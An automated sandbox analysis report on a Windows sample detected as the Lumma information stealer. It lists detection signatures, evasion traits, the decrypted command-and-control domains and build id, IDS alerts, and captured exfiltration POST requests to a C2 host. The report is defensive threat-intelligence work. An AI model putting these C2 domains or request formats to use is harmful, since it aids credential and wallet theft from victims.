Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532431
MD5: 34124e70e2508de56d89b57345b39f65
SHA1: 21ba55d1758aecf6a8d54e3550a1cf4c2764c255
SHA256: 582e159bf52a2543356aaa21d4e0b6d12c831e53640bb2a92528d6b76a759a37
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • file.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 34124E70E2508DE56D89B57345B39F65)
    • WerFault.exe (PID: 2924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["spirittunek.store", "bathdoomgaz.store", "clearancek.site", "licendfilteo.site", "eaglepawnoy.store", "dissapoiznw.store", "mobbipenju.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
Source: decrypted.memstr
Rule: JoeSecurity_LummaCStealer_2
Description: Yara detected LummaC Stealer
Author: Joe Security
Strings: -
    No Sigma rule has matched
    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-10-13T06:54:09.743288+0200  2054653  1         A Network Trojan was detected         192.168.2.5  49705        104.21.53.8     443               TCP
    2024-10-13T06:54:10.829268+0200  2054653  1         A Network Trojan was detected         192.168.2.5  49706        104.21.53.8     443               TCP
    2024-10-13T06:54:09.743288+0200  2049836  1         A Network Trojan was detected         192.168.2.5  49705        104.21.53.8     443               TCP
    2024-10-13T06:54:10.829268+0200  2049812  1         A Network Trojan was detected         192.168.2.5  49706        104.21.53.8     443               TCP
    2024-10-13T06:54:07.260005+0200  2056477  1         Domain Observed Used for C2 Detected  192.168.2.5  54989        1.1.1.1         53                UDP
    2024-10-13T06:54:07.200212+0200  2056471  1         Domain Observed Used for C2 Detected  192.168.2.5  60610        1.1.1.1         53                UDP
    2024-10-13T06:54:07.238202+0200  2056481  1         Domain Observed Used for C2 Detected  192.168.2.5  56335        1.1.1.1         53                UDP
    2024-10-13T06:54:07.227366+0200  2056483  1         Domain Observed Used for C2 Detected  192.168.2.5  61073        1.1.1.1         53                UDP
    2024-10-13T06:54:07.280214+0200  2056473  1         Domain Observed Used for C2 Detected  192.168.2.5  63164        1.1.1.1         53                UDP
    2024-10-13T06:54:07.212395+0200  2056485  1         Domain Observed Used for C2 Detected  192.168.2.5  58072        1.1.1.1         53                UDP
    2024-10-13T06:54:07.269827+0200  2056475  1         Domain Observed Used for C2 Detected  192.168.2.5  52579        1.1.1.1         53                UDP
    2024-10-13T06:54:07.249676+0200  2056479  1         Domain Observed Used for C2 Detected  192.168.2.5  65011        1.1.1.1         53                UDP
    2024-10-13T06:54:08.962762+0200  2858666  1         Domain Observed Used for C2 Detected  192.168.2.5  49704        104.102.49.254  443               TCP

    AV Detection

    Source: file.exe | Avira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badges | URL Reputation: Label: malware
    Source: file.exe.7140.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["spirittunek.store", "bathdoomgaz.store", "clearancek.site", "licendfilteo.site", "eaglepawnoy.store", "dissapoiznw.store", "mobbipenju.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
    Source: sergei-esenin.com | Virustotal: Detection: 17%
    Source: licendfilteo.site | Virustotal: Detection: 15%
    Source: bathdoomgaz.store | Virustotal: Detection: 21%
    Source: studennotediw.store | Virustotal: Detection: 17%
    Source: dissapoiznw.store | Virustotal: Detection: 21%
    Source: eaglepawnoy.store | Virustotal: Detection: 18%
    Source: spirittunek.store | Virustotal: Detection: 21%
    Source: clearancek.site | Virustotal: Detection: 17%
    Source: mobbipenju.store | Virustotal: Detection: 21%
    Source: https://sergei-esenin.com:443/api | Virustotal: Detection: 18%
    Source: https://sergei-esenin.com/api | Virustotal: Detection: 18%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exe | Joe Sandbox ML: detected
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: clearancek.site
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: licendfilteo.site
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: spirittunek.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: bathdoomgaz.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: studennotediw.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: dissapoiznw.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: eaglepawnoy.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: mobbipenju.store
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: clearancek.site
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
    Source: 00000000.00000002.2261645060.0000000000781000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49706 version: TLS 1.2

    Networking

    Source: Network traffic | Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:65011 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:52579 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:61073 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:60610 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:63164 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:58072 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:56335 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:54989 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.53.8:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.53.8:443
    Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.53.8:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.53.8:443
    Source: Malware configuration extractor | URLs: spirittunek.store
    Source: Malware configuration extractor | URLs: bathdoomgaz.store
    Source: Malware configuration extractor | URLs: clearancek.site
    Source: Malware configuration extractor | URLs: licendfilteo.site
    Source: Malware configuration extractor | URLs: eaglepawnoy.store
    Source: Malware configuration extractor | URLs: dissapoiznw.store
    Source: Malware configuration extractor | URLs: mobbipenju.store
    Source: Malware configuration extractor | URLs: studennotediw.store
    Source: Joe Sandbox View | IP Address: 104.21.53.8
    Source: Joe Sandbox View | IP Address: 104.102.49.254
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global traffic | HTTP traffic detected:
        GET /profiles/76561199724331900 HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Host: steamcommunity.com
    Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: sergei-esenin.com
    Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        Cookie: __cf_mw_byp=hBo.L319DdN_T0PJa7tYvjmaL4kOlNqAcP2mUK4xBAM-1728795249-0.0.1.1-/api
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 52
        Host: sergei-esenin.com
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 10 times)
    Source: global traffic | DNS traffic detected: DNS query: clearancek.site
    Source: global traffic | DNS traffic detected: DNS query: mobbipenju.store
    Source: global traffic | DNS traffic detected: DNS query: eaglepawnoy.store
    Source: global traffic | DNS traffic detected: DNS query: dissapoiznw.store
    Source: global traffic | DNS traffic detected: DNS query: studennotediw.store
    Source: global traffic | DNS traffic detected: DNS query: bathdoomgaz.store
    Source: global traffic | DNS traffic detected: DNS query: spirittunek.store
    Source: global traffic | DNS traffic detected: DNS query: licendfilteo.site
    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
    Source: global traffic | DNS traffic detected: DNS query: sergei-esenin.com
    Source: unknown | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.2078167697.0000000001225000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.2078167697.000000000122A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.2078215009.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078102715.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/h;
